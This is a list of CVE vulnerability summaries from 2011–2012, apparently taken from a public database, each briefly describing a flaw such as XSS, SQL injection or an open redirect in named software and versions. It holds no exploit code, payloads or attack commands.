[CVE-2012-0234] SQL injection vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary SQL commands via a malformed URL.
[CVE-2012-0233] Cross-site scripting (XSS) vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via a malformed URL.
[CVE-2012-0232] Directory traversal vulnerability in rifsrvd.exe in the Remote Interface Service in GE Intelligent Platforms Proficy Real-Time Information Portal 2.6, 3.0, 3.0 SP1, and 3.5 allows remote attackers to modify the configuration via crafted strings.
[CVE-2012-0225] Cross-site scripting (XSS) vulnerability in Invensys Wonderware Information Server 4.0 SP1 and 4.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0220] Multiple cross-site scripting (XSS) vulnerabilities in the meta plugin (Plugin/meta.pm) in ikiwiki before 3.20120516 allow remote attackers to inject arbitrary web script or HTML via the (1) author or (2) authorurl meta tags.
[CVE-2012-0209] Horde 3.3.12, Horde Groupware 1.2.10, and Horde Groupware Webmail Edition 1.2.10, as distributed by FTP between November 2011 and February 2012, contains an externally introduced modification (Trojan Horse) in templates/javascript/open_calendar.js, which allows remote attackers to execute arbitrary PHP code.
[CVE-2012-0203] Cross-site scripting (XSS) vulnerability in InfoSphere Metadata Workbench (MWB) 8.1 through 8.7 in IBM InfoSphere Information Server 8.1, 8.5 before FP3, and 8.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0193] IBM WebSphere Application Server (WAS) 6.0 through 6.0.2.43, 6.1 before 6.1.0.43, 7.0 before 7.0.0.23, and 8.0 before 8.0.0.3 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
[CVE-2012-0191] The web container in IBM Lotus Expeditor 6.1.x and 6.2.x before 6.2 FP5+Security Pack does not properly perform access control for requests, which allows remote attackers to spoof a localhost request origin via crafted headers.
[CVE-2012-0179] Double free vulnerability in tcpip.sys in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that binds an IPv6 address to a local interface, aka "TCP/IP Double Free Vulnerability."
[CVE-2012-0156] DirectWrite in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly render Unicode characters, which allows remote attackers to cause a denial of service (application hang) via a (1) instant message or (2) web site, aka "DirectWrite Application Denial of Service Vulnerability."
[CVE-2012-0147] Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 does not properly configure the default web site, which allows remote attackers to obtain sensitive information via a crafted HTTPS request, aka "Unfiltered Access to UAG Default Website Vulnerability."
[CVE-2012-0146] Open redirect vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "UAG Blind HTTP Redirect Vulnerability."
[CVE-2012-0145] Cross-site scripting (XSS) vulnerability in wizardlist.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in wizardlist.aspx Vulnerability."
[CVE-2012-0144] Cross-site scripting (XSS) vulnerability in themeweb.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in themeweb.aspx Vulnerability."
[CVE-2012-0132] Cross-site scripting (XSS) vulnerability in HP Business Availability Center (BAC) 9.01 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0128] HP Onboard Administrator (OA) before 3.50 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2012-0108] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Web.
[CVE-2012-0107] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote attackers to affect availability via unknown vectors related to Web.
[CVE-2012-0106] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web.
[CVE-2012-0104] Unspecified vulnerability in Oracle GlassFish Enterprise Server 3.0.1 and 3.1.1 allows remote attackers to affect availability via unknown vectors related to Web Container.
[CVE-2012-0095] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Web.
[CVE-2012-0093] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote attackers to affect integrity via unknown vectors related to Web.
[CVE-2012-0092] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect integrity via unknown vectors related to Web.
[CVE-2012-0090] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect integrity via unknown vectors related to Web.
[CVE-2012-0086] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Web.
[CVE-2012-0085] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 7.5.2 and 10.1.3.5.1 allows remote attackers to affect integrity via unknown vectors related to Content Server.
[CVE-2012-0084] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 7.5.2, 10.1.3.5.1, 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote authenticated users to affect integrity via unknown vectors related to Content Server.
[CVE-2012-0083] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 7.5.2, 10.1.3.5.1, 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Search.
[CVE-2012-0077] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4, 10.0.2, 10.3.3, 10.3.4, and 10.3.5 allows remote authenticated users to affect integrity, related to WLS-Console.
[CVE-2012-0071] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote attackers to affect integrity via unknown vectors related to Web.
[CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
[CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
[CVE-2012-0040] Cross-site scripting (XSS) vulnerability in modules/core/www/no_cookie.php in SimpleSAMLphp 1.8.1 and possibly other versions before 1.8.2 allows remote attackers to inject arbitrary web script or HTML via the retryURL parameter.
[CVE-2012-0034] The NonManagedConnectionFactory in JBoss Enterprise Application Platform (EAP) 5.1.2 and 5.2.0, Web Platform (EWP) 5.1.2 and 5.2.0, and BRMS Platform before 5.3.1 logs the username and password in cleartext when an exception is thrown, which allows local users to obtain sensitive information by reading the log file.
[CVE-2012-0017] Cross-site scripting (XSS) vulnerability in inplview.aspx in Microsoft SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in inplview.aspx Vulnerability."
[CVE-2012-0012] Microsoft Internet Explorer 9 does not properly handle the creation and initialization of string objects, which allows remote attackers to read data from arbitrary process-memory locations via a crafted web site, aka "Null Byte Information Disclosure Vulnerability."
[CVE-2012-0010] Microsoft Internet Explorer 6 through 9 does not properly perform copy-and-paste operations, which allows user-assisted remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Copy and Paste Information Disclosure Vulnerability."
[CVE-2011-5265] Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. NOTE: this has been disputed by a third party.
[CVE-2011-5264] Cross-site scripting (XSS) vulnerability in lazyest-backup.php in the Lazyest Backup plugin before 0.2.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xml_or_all parameter.
[CVE-2011-5263] Cross-site scripting (XSS) vulnerability in RetrieveMailExamples in SAP NetWeaver 7.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the server parameter.
[CVE-2011-5261] Cross-site scripting (XSS) vulnerability in serverreport.cgi in Axis M10 Series Network Cameras M1054 firmware 5.21 and earlier allows remote attackers to inject arbitrary web script or HTML via the pageTitle parameter to admin/showReport.shtml.
[CVE-2011-5260] Cross-site scripting (XSS) vulnerability in SAP/BW/DOC/METADATA in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2011-5258] Multiple cross-site scripting (XSS) vulnerabilities in OrangeHRM before 2.6.11.2 allow remote attackers to inject arbitrary web script or HTML via the (1) uniqcode or (2) isAdmin parameter to index.php
[CVE-2011-5257] Multiple cross-site scripting (XSS) vulnerabilities in the Classipress theme before 3.1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) twitter_id parameter related to the Twitter widget and (2) facebook_id parameter related to the Facebook widget.
[CVE-2011-5256] Cross-site scripting (XSS) vulnerability in the tooltips in LimeSurvey before 1.91+ Build 11379-20111116, when viewing survey results, allows remote attackers to inject arbitrary web script or HTML via unknown parameters.
[CVE-2011-5255] Multiple cross-site scripting (XSS) vulnerabilities in admin/login in X3 CMS 0.4.3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO, (2) username, or (3) password parameter.
[CVE-2011-5252] Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter.
[CVE-2011-5251] Open redirect vulnerability in forum/login.php in vBulletin 4.1.3 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter in a lostpw action.
[CVE-2011-5228] Cross-site scripting (XSS) vulnerability in the Search module (quickstart/search) in appRain CMF 0.1.5 allows remote attackers to inject arbitrary web script or HTML via the ss parameter.
[CVE-2011-5225] Cross-site scripting (XSS) vulnerability in wordpress_sentinel.php in the Sentinel plugin 1.0.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2011-5221] Cross-site scripting (XSS) vulnerability in the getLog function in svnlook.php in WebSVN before 2.3.1 allows remote attackers to inject arbitrary web script or HTML via the path parameter to (1) comp.php, (2) diff.php, or (3) revision.php.
[CVE-2011-5220] Cross-site scripting (XSS) vulnerability in templates/default/Admin/Login.html in PHP-SCMS 1.6.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang parameter to index.php.
[CVE-2011-5214] Multiple cross-site scripting (XSS) vulnerabilities in BrowserCRM 5.100.01 and earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) modules/admin/admin_module_index.php, or (3) modules/calendar/customise_calendar_times.php
[CVE-2011-5211] Cross-site scripting (XSS) vulnerability in the poll module in Subrion CMS 2.0.4 allows remote attackers to inject arbitrary web script or HTML via the title field. NOTE: some of these details are obtained from third party information. NOTE: this might overlap CVE-2012-5452.
[CVE-2011-5209] Cross-site scripting (XSS) vulnerability in search/ in GraphicsClone Script, possibly 1.11, allows remote attackers to inject arbitrary web script or HTML via the term parameter.
[CVE-2011-5207] Cross-site scripting (XSS) vulnerability in admin/OptionsPostsList.php in the TheCartPress plugin for WordPress before 1.1.6 before 2011-12-31 allows remote attackers to inject arbitrary web script or HTML via the tcp_name_post_XXXXX parameter.
[CVE-2011-5206] Cross-site scripting (XSS) vulnerability in notes.php in Rapidleech before 2.3 rev42 SVN r399 allows remote attackers to inject arbitrary web script or HTML via the notes parameter.
[CVE-2011-5205] Cross-site scripting (XSS) vulnerability in audl.php in Rapidleech 2.3 rev42 SVN r358, rev43 SVN r397, and earlier allows remote attackers to inject arbitrary web script or HTML via the links parameter.
[CVE-2011-5204] Akiva WebBoard 8.x stores passwords in plaintext, which allows local users to obtain sensitive information by reading from the database.
[CVE-2011-5203] SQL injection vulnerability in WB/Default.asp in Akiva WebBoard before 8 SR 1 allows remote attackers to execute arbitrary SQL commands via the name parameter. NOTE: some of these details are obtained from third party information.
[CVE-2011-5199] Cross-site scripting (XSS) vulnerability in sign.php in tinyguestbook allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2011-5194] Cross-site scripting (XSS) vulnerability in vendors/samswhois/samswhois.inc.php in the Whois Search plugin before 1.4.2.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vulnerability than CVE-2011-5193.
[CVE-2011-5193] Cross-site scripting (XSS) vulnerability in vendors/samswhois/samswhois.inc.php in the Whois Search plugin 1.4.2.3 for WordPress, when the WHOIS widget is enabled, allows remote attackers to inject arbitrary web script or HTML via the domain parameter to index.php, a different vulnerability than CVE-2011-5194.
[CVE-2011-5192] Cross-site scripting (XSS) vulnerability in pretty-bar.php in Pretty Link Lite plugin before 1.5.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the slug parameter, a different vulnerability than CVE-2011-5191.
[CVE-2011-5191] Cross-site scripting (XSS) vulnerability in pretty-bar.php in Pretty Link Lite plugin before 1.5.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the slug parameter, a different vulnerability than CVE-2011-5192.
[CVE-2011-5190] Multiple cross-site scripting (XSS) vulnerabilities in Social Book Facebook Clone 2010 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO parameter to (1) signup.php, (2) lostpass.php, (3) login.php, (4) index.php, (5) help_tos.php, (6) help_contact.php, or (7) help.php.
[CVE-2011-5189] Cross-site scripting (XSS) vulnerability in the Webform Validation module 6.x-1.x before 6.x-1.5 and 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with permissions to "update Webform nodes" to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-5188] Cross-site scripting (XSS) vulnerability in the Support Timer module 6.x-1.x before 6.x-1.4 for Drupal allows remote authenticated users with the "track time spent" permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-5187] Cross-site scripting (XSS) vulnerability in the Support Ticketing System module 6.x-1.x before 6.x-1.7 for Drupal allows remote authenticated users with the "administer support projects" permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-5186] Cross-site scripting (XSS) vulnerability in jbshop.php in the jbShop plugin for e107 7 allows remote attackers to inject arbitrary web script or HTML via the item_id parameter.
[CVE-2011-5185] Cross-site scripting (XSS) vulnerability in video_comments.php in Online Subtitles Workshop before 2.0 rev 131 allows remote attackers to inject arbitrary web script or HTML via the comment parameter.
[CVE-2011-5184] Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node Manager i 9.10 allow remote attackers to inject arbitrary web script or HTML via the (1) node parameter to nnm/mibdiscover
[CVE-2011-5183] Multiple SQL injection vulnerabilities in OrderSys 1.6.4 and earlier allow remote attackers to execute arbitrary SQL commands via the where_clause parameter to (1) index.php, (2) index_long.php, or (3) index_short.php in ordering/interface_creator/.
[CVE-2011-5182] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in lanoba-social-plugin/index.php in the Lanoba Social plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the action parameter. NOTE: the vendor disputes this issue, stating "Lanoba's plug in does sanitize user input, and because that input is never sent to the browser, an attacker has no way of executing script or code on a user's behalf."
[CVE-2011-5181] Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. NOTE: some of these details are obtained from third party information.
[CVE-2011-5180] Cross-site scripting (XSS) vulnerability in wp-1pluginjquery.php in the ZooEffect plugin 1.01 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. NOTE: some of these details are obtained from third party information. NOTE: this has been disputed by a third party.
[CVE-2011-5179] Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
[CVE-2011-5178] Multiple cross-site scripting (XSS) vulnerabilities in netmri/config/userAdmin/login.tdf in Infoblox NetMRI 6.0.2.42, 6.1.2, 6.2.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) eulaAccepted or (2) mode parameter.
[CVE-2011-5177] Multiple cross-site scripting (XSS) vulnerabilities in admin/controller.php in eSyndiCat Pro 2.3.05 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to the admins (2) blocks, (3) articles, or (4) suggest-category
[CVE-2011-5176] Multiple cross-site scripting (XSS) vulnerabilities in search.php in Banana Dance, possibly B.1.5 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) q or (2) category parameter.
[CVE-2011-5160] Cross-site scripting (XSS) vulnerability in setup.php in OpenEMR 4 allows remote attackers to inject arbitrary web script or HTML via the site parameter.
[CVE-2011-5159] Cross-site scripting (XSS) vulnerability in admin/configuration.php in Geeklog before 1.7.1sr1 allows remote attackers to inject arbitrary web script or HTML via the sub_group parameter, a different vulnerability than CVE-2011-4942.
[CVE-2011-5150] Multiple cross-site scripting (XSS) vulnerabilities in SpamTitan 5.07 and possibly earlier allow remote attackers or authenticated users to inject arbitrary web script or HTML via the (1) ipaddress or (2) domain parameter to setup-network.php, different vectors than CVE-2011-5149. NOTE: the provenance of this information is unknown
[CVE-2011-5149] Multiple cross-site scripting (XSS) vulnerabilities in SpamTitan 5.08 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) testaddr or (2) testpass parameter to auth-settings.php
[CVE-2011-5147] Static code injection vulnerability in ajax_save_name.php in the Ajax File Manager module in the tinymce plugin in FreeWebshop 2.2.9 R2 and earlier allows remote attackers to inject arbitrary PHP code into data.php via the selected document, as demonstrated by a call to ajax_file_cut.php and then to ajax_save_name.php.
[CVE-2011-5143] Multiple cross-site scripting (XSS) vulnerabilities in Open Business Management (OBM) 2.3.20 and probably earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tf_name, (2) tf_delegation, and (3) tf_ip parameters to index.php. NOTE: the provenance of this information is unknown
[CVE-2011-5142] Multiple cross-site scripting (XSS) vulnerabilities in Open Business Management (OBM) 2.4.0-rc13 and probably earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tf_delegation, (2) tf_ip, or (3) tf_name parameter in a search action to host/host_index.php
[CVE-2011-5138] Cross-site scripting (XSS) vulnerability in member.php in tForum b0.915 allows remote attackers to inject arbitrary web script or HTML via the username parameter in a viewprofile action.
[CVE-2011-5132] Cross-site scripting (XSS) vulnerability in MyBB before 1.6.5 allows remote attackers to inject arbitrary web script or HTML via vectors related to "usernames via AJAX."
[CVE-2011-5128] Multiple cross-site scripting (XSS) vulnerabilities in the Adminimize plugin before 1.7.22 for WordPress allow remote attackers to inject arbitrary web script or HTML via the page parameter to (1) inc-options/deinstall_options.php, (2) inc-options/theme_options.php, or (3) inc-options/im_export_options.php, or the (4) post or (5) post_ID parameters to adminimize.php, different vectors than CVE-2011-4926.
[CVE-2011-5125] Cross-site scripting (XSS) vulnerability in Blue Coat Director before 5.5.2.3 allows remote attackers to inject arbitrary web script or HTML via vectors involving the HTTP TRACE method.
[CVE-2011-5115] Cross-site scripting (XSS) vulnerability in DLGuard, possibly 4.6 and earlier, allows remote attackers to inject arbitrary web script or HTML via the searchCart parameter to index.php.
[CVE-2011-5114] Multiple cross-site scripting (XSS) vulnerabilities in the Authoritative DNS - DNS Zones page in Barracuda Link Balancer 330 Firmware 1.3.2.005 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) zoneid or (2) scope parameter.
[CVE-2011-5111] Multiple SQL injection vulnerabilities in Kajian Website CMS Balitbang 3.x allow remote attackers to execute arbitrary SQL commands via the hal parameter to (1) the data module in alumni.php
[CVE-2011-5109] Multiple SQL injection vulnerabilities in Freelancer calendar 1.01 and earlier allow remote attackers to inject arbitrary web script or HTML via the SearchField parameter in a search action to (1) category_list.php, (2) Copy_of_calendar_list.php, (3) customer_statistics_list.php, (4) customer_list.php, and (5) task_statistics_list.php in the worldcalendar directory.
[CVE-2011-5108] Cross-site scripting (XSS) vulnerability in config.php in AdaptCMS 2.0.0 and 2.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-5107] Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2011-5106] Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2011-5105] Multiple cross-site scripting (XSS) vulnerabilities in EmployeeSearch.cc in ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 allow remote attackers to inject arbitrary web script or HTML via the (1) searchType and (2) searchString parameters, a different vulnerability than CVE-2010-3274.
[CVE-2011-5104] Cross-site scripting (XSS) vulnerability in wpsc-admin/display-sales-logs.php in WP e-Commerce plugin 3.8.7.1 and possibly earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the custom_text parameter. NOTE: some of these details are obtained from third party information.
[CVE-2011-5088] The GENESIS32 IcoSetServer ActiveX control in ICONICS GENESIS32 9.21 and BizViz 9.21 configures the trusted zone on the basis of user input, which allows remote attackers to execute arbitrary code via a crafted web site, related to a "Workbench32/WebHMI component SetTrustedZone Policy vulnerability."
[CVE-2011-5086] https50.ocx in IP*Works! SSL in the server in Unitronics UniOPC before 2.0.0 does not properly implement an unspecified function, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site.
[CVE-2011-5084] Cross-site scripting (XSS) vulnerability in Movable Type 4.x before 4.36 and 5.x before 5.05 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-5082] Cross-site scripting (XSS) vulnerability in the s2Member Pro plugin before 111220 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s2member_pro_authnet_checkout[coupon] parameter (aka Coupon Code field).
[CVE-2011-5081] Cross-site scripting (XSS) vulnerability in RestoreFile.pm in BackupPC 3.1.0, 3.2.1, and possibly other earlier versions allows remote attackers to inject arbitrary web script or HTML via the share parameter in a RestoreFile action to index.cgi.
[CVE-2011-5080] Cross-site scripting (XSS) vulnerability in lib/class.tx_jftcaforms_tceFunc.php in the Additional TCA Forms (jftcaforms) extension before 0.2.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-5079] Open redirect vulnerability in the Modern FAQ (irfaq) extension 1.1.2 and other versions before 1.1.4 for TYPO3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL, probably in the "return url parameter."
[CVE-2011-5073] Multiple cross-site scripting (XSS) vulnerabilities in Support Incident Tracker (aka SiT!) before 3.65 allow remote attackers to inject arbitrary web script or HTML via the (1) mode parameter to contact_support.php
[CVE-2011-5070] Multiple cross-site scripting (XSS) vulnerabilities in Support Incident Tracker (aka SiT!) 3.65 allow remote attackers to inject arbitrary web script or HTML via (1) the file name to incident_attachments.php
[CVE-2011-5066] The SibRaRecoverableSiXaResource class in the Default Messaging Component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.41 does not properly handle a Service Integration Bus (SIB) dump operation involving the First Failure Data Capture (FFDC) introspection code, which allows local users to obtain sensitive information by reading the FFDC log file.
[CVE-2011-5065] Cross-site scripting (XSS) vulnerability in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.41 allows remote attackers to inject arbitrary web script or HTML via vectors related to web messaging.
[CVE-2011-5058] The CmbWebserver.dll module of the Control service in 3S CoDeSys 3.4 SP4 Patch 2 allows remote attackers to create arbitrary directories under the web root by specifying a non-existent directory using \ (backslash) characters in an HTTP GET request.
[CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
[CVE-2011-5052] Stack-based buffer overflow in CoCSoft Stream Down 6.8.0 allows remote web servers to execute arbitrary code via a long response to a download request.
[CVE-2011-5051] Multiple unrestricted file upload vulnerabilities in the WP Symposium plugin before 11.12.24 for WordPress allow remote attackers to execute arbitrary code by uploading a file with an executable extension using (1) uploadify/upload_admin_avatar.php or (2) uploadify/upload_profile_avatar.php, then accessing it via a direct request to the file in an unspecified directory inside the webroot.
[CVE-2011-5048] Multiple cross-site scripting (XSS) vulnerabilities in IBM Web Experience Factory (aka WEF, formerly WebSphere Portlet Factory) 7.0 and 7.0.1 allow remote attackers to inject arbitrary web script or HTML via a (1) text INPUT element or (2) TEXTAREA element, related to an interaction between Smart Refresh and Dojo.
[CVE-2011-5047] Cross-site scripting (XSS) vulnerability in status_rrd_graph.php in pfSense before 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the style parameter.
[CVE-2011-5046] The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability."
[CVE-2011-5045] Cross-site scripting (XSS) vulnerability in details_view.php in PHP Booking Calendar 10e allows remote attackers to inject arbitrary web script or HTML via the page_info_message parameter.
[CVE-2011-5042] Cross-site scripting (XSS) vulnerability in inc/lib/lib.base.php in SASHA 0.2.0 allows remote attackers to inject arbitrary web script or HTML via the instructors parameter. NOTE: the original disclosure also mentions the section_title parameter, but this was disputed by the vendor and retracted by the original researcher.
[CVE-2011-5041] Multiple cross-site scripting (XSS) vulnerabilities in Pulse Pro CMS 1.7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) d parameter in a blocks action and (2) post_id parameter in an edit-post action to index.php.
[CVE-2011-5040] Multiple cross-site scripting (XSS) vulnerabilities in Infoproject Biznis Heroj allow remote attackers to inject arbitrary web script or HTML via the config parameter to (1) nalozi_naslov.php and (2) widget.dokumenti_lista.php.
[CVE-2011-5031] Multiple SQL injection vulnerabilities in servlet/capexweb.parentvalidatepassword in cApexWEB 1.1 allow remote attackers to execute arbitrary SQL commands via the (1) dfuserid and (2) dfpassword parameters. NOTE: some of these details are obtained from third party information.
[CVE-2011-5030] Cross-site scripting (XSS) vulnerability in the Meta tags quick module 7.x-2.x before 7.x-2.3 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors, probably related to "names of entity bundles."
[CVE-2011-5029] Multiple cross-site scripting (XSS) vulnerabilities in Simple PHP Blog 0.7.0 and possibly earlier allow remote attackers to inject arbitrary web script or HTML via the (1) entry parameter to delete.php or (2) category parameter to index.php.
[CVE-2011-5027] Cross-site scripting (XSS) vulnerability in ZABBIX before 1.8.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the profiler.
[CVE-2011-5026] Cross-site scripting (XSS) vulnerability in the addPost function in data/functions.php in Winn GuestBook before 2.4.8d allows remote attackers to inject arbitrary web script or HTML via the name parameter to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2011-5025] Multiple cross-site scripting (XSS) vulnerabilities in the wiki application in Yaws 1.88 allow remote attackers to inject arbitrary web script or HTML via (1) the tag parameter to editTag.yaws, (2) the index parameter to showOldPage.yaws, (3) the node parameter to allRefsToMe.yaws, or (4) the text parameter to editPage.yaws.
[CVE-2011-5024] Cross-site scripting (XSS) vulnerability in mmsearch/design in the Mailman/htdig integration patch for Mailman allows remote attackers to inject arbitrary web script or HTML via the config parameter.
[CVE-2011-5023] Cross-site scripting (XSS) vulnerability in Pligg CMS 1.1.4 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the search program, a different vulnerability than CVE-2011-3986.
[CVE-2011-5019] Cross-site scripting (XSS) vulnerability in setup/index.php in Textpattern CMS 4.4.1, when the product is incompletely installed, allows remote attackers to inject arbitrary web script or HTML via the ddb parameter.
[CVE-2011-5009] The CmpWebServer.dll module in the Control service in 3S CoDeSys 3.4 SP4 Patch 2 allows remote attackers to cause a denial of service (NULL pointer dereference) via (1) a crafted Content-Length in an HTTP POST or (2) an invalid HTTP request method.
[CVE-2011-5007] Stack-based buffer overflow in the CmpWebServer component in 3S CoDeSys 3.4 SP4 Patch 2 and earlier, as used on the ABB AC500 PLC and possibly other products, allows remote attackers to execute arbitrary code via a long URI to TCP port 8080.
[CVE-2011-4969] Cross-site scripting (XSS) vulnerability in jQuery before 1.6.3, when using location.hash to select elements, allows remote attackers to inject arbitrary web script or HTML via a crafted tag.
[CVE-2011-4962] code/sitefeatures/PageCommentInterface.php in SilverStripe 2.4.x before 2.4.6 might allow remote attackers to execute arbitrary code via a crafted cookie in a user comment submission, which is not properly handled when it is deserialized.
[CVE-2011-4956] Cross-site scripting (XSS) vulnerability in WordPress before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
